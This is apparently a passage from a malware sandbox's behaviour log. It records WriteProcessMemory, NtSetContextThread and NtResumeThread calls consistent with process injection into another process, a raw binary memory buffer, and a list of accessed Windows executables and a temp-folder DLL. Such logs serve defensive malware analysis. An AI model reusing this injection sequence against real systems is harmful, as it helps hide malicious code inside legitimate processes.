buffer: cøHøg>½ü×üg>%ýg>é©g>š¬¬]V] @Þ?ýî´Ý´]g>g>/J‚Ißü«ünɵп,ß,ßÀ=~@֐®‘a ÿÑÔSÚ£Ü7ØeJȊþ´£! b Er4NPNWN]TUZ[ äøää äö_^îØØäüûüû í9<8;ú` Ÿž†…¢†…§µ¶³´±²¯°†…¸ Ÿ†… Y
base_address: 0x00470000
process_identifier: 2612
process_handle: 0x00000488
1 1 0

WriteProcessMemory

buffer:
base_address: 0x00471000
process_identifier: 2612
process_handle: 0x00000488
1 1 0

WriteProcessMemory

buffer:
base_address: 0x00476000
process_identifier: 2612
process_handle: 0x00000488
1 1 0

WriteProcessMemory

buffer: @
base_address: 0x7efde008
process_identifier: 2612
process_handle: 0x00000488
1 1 0

NtSetContextThread

registers.eip: 0
registers.esp: 0
registers.edi: 0
registers.eax: 4394837
registers.ebp: 0
registers.edx: 0
registers.ebx: 2130567168
registers.esi: 0
registers.ecx: 0
thread_handle: 0x000005c8
process_identifier: 2612
1 0 0

NtResumeThread

thread_handle: 0x000005c8
suspend_count: 1
process_identifier: 2612
1 0 0

NtResumeThread

thread_handle: 0x00000294
suspend_count: 1
process_identifier: 2236
1 0 0

NtResumeThread

thread_handle: 0x000002e8
suspend_count: 1
process_identifier: 2236
1 0 0

NtResumeThread

thread_handle: 0x00000444
suspend_count: 1
process_identifier: 2236
1 0 0

NtResumeThread

thread_handle: 0x00000490
suspend_count: 1
process_identifier: 2236
1 0 0
file C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
file C:\Windows\System32\ie4uinit.exe
file C:\Program Files\Windows Sidebar\sidebar.exe
file C:\Windows\System32\WindowsAnytimeUpgradeUI.exe
file C:\Windows\System32\xpsrchvw.exe
file C:\Windows\System32\displayswitch.exe
file C:\Program Files\Common Files\Microsoft Shared\ink\mip.exe
file C:\Windows\System32\mblctr.exe
file C:\Windows\System32\mstsc.exe
file C:\Windows\System32\SnippingTool.exe
file C:\Windows\System32\SoundRecorder.exe
file C:\Windows\System32\dfrgui.exe
file C:\Windows\System32\msinfo32.exe
file C:\Windows\System32\rstrui.exe
file C:\Program Files\Common Files\Microsoft Shared\ink\ShapeCollector.exe
file C:\Program Files\Windows Journal\Journal.exe
file C:\Windows\System32\MdSched.exe
file C:\Windows\System32\msconfig.exe
file C:\Windows\System32\recdisc.exe
file C:\Windows\System32\msra.exe
file C:\Users\test22\AppData\Local\Temp\bb17803d-4384-4bab-809b-c199792eadf6\AgileDotNetRT.dll
file C:\Users\test22\AppData\Local\Temp\97c2e543-1829-4fd6-91a1-35d2e827242f\AgileDotNetRT.dll
file C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe